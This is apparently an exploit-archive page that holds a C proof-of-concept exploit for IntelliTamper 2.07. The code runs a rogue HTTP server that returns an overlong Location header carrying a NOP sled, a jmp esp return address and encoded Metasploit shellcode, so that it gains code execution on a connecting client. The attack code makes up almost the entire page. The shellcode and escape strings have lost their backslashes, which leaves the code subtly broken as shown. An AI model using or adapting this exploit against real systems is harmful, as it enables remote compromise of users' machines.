[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
# Published : 2008-08-10
# Author : Wojciech Pawlikowski
# Previous Title : Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
# Next Title : IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
/**
**
** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
**
** Based on exploit by Koshi (written in Perl). This one should be more
** stable. Just for fun and to learn more about win32 exploitation.
**
** by Wojciech Pawlikowski (wojtekp@gmail.com)
**/
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
"x58x30x42x31x50x41x42x6bx41x41x52x41x32x41x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x6dx39x59x6cx69"
"x78x41x54x75x50x77x70x45x50x6cx4bx73x75x55x6cx4e"
"x6bx61x6cx33x35x54x38x55x51x7ax4fx4cx4bx70x4fx45"
"x48x4cx4bx33x6fx67x50x45x51x4ax4bx43x79x6cx4bx34"
"x74x4cx4bx47x71x6ax4ex64x71x6fx30x5ax39x6ex4cx4e"
"x64x4fx30x30x74x45x57x79x51x6bx7ax74x4dx37x71x5a"
"x62x4ax4bx5ax54x55x6bx31x44x71x34x55x54x71x65x4b"
"x55x6cx4bx73x6fx61x34x45x51x78x6bx65x36x6cx4bx36"
"x6cx50x4bx4ex6bx71x4fx57x6cx35x51x38x6bx4cx4bx77"
"x6cx6ex6bx77x71x6ax4bx4cx49x71x4cx37x54x34x44x7a"
"x63x54x71x39x50x61x74x6cx4bx43x70x46x50x4bx35x49"
"x50x72x58x46x6cx6cx4bx47x30x36x6cx6cx4bx70x70x37"
"x6cx4ex4dx4cx4bx65x38x46x68x7ax4bx64x49x4ex6bx4f"
"x70x6ex50x77x70x77x70x45x50x6cx4bx70x68x37x4cx63"
"x6fx64x71x49x66x73x50x31x46x6ex69x59x68x4bx33x69"
"x50x51x6bx30x50x32x48x5ax4fx5ax6ex69x70x45x30x33"
"x58x4cx58x6bx4ex4cx4ax76x6ex66x37x6bx4fx7ax47x30"
"x6dx53x43x62x50x53x51x73x59x32x4ex33x44x45x50x42";
int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE + 100] = { 0 };
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}
serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}
if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}
listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);
printf("[*] Waiting for a connection...n");
while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}
printf("[+] Connection from %s:%dn", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE + 1);
for (i = 0; i <= 1540; i += 4)
*(long *)&overflow[i] = RETADDR;
for (i = 0; i < 1536; i++)
overflow[i] = NOP;
memcpy(overflow + 550, shellcode, strlen(shellcode));
memcpy(overflow + i + 4, "xe9x14xfcxffxff", 5); // jmp -1000 - jump to our buffer
i = sprintf(req, "200 HTTP/1.1rnDate: 2008-07-24 20:14:31rnLocation: ");
memcpy(req + i, overflow, strlen(overflow));
memcpy(req + i + strlen(overflow), "rnrn", 4);
write(cli_sock, req, strlen(req));
printf("[+] Exploit sent!n");
close(cli_sock);
}
close(sockfd);
}
// www.Syue.com [2008-08-10]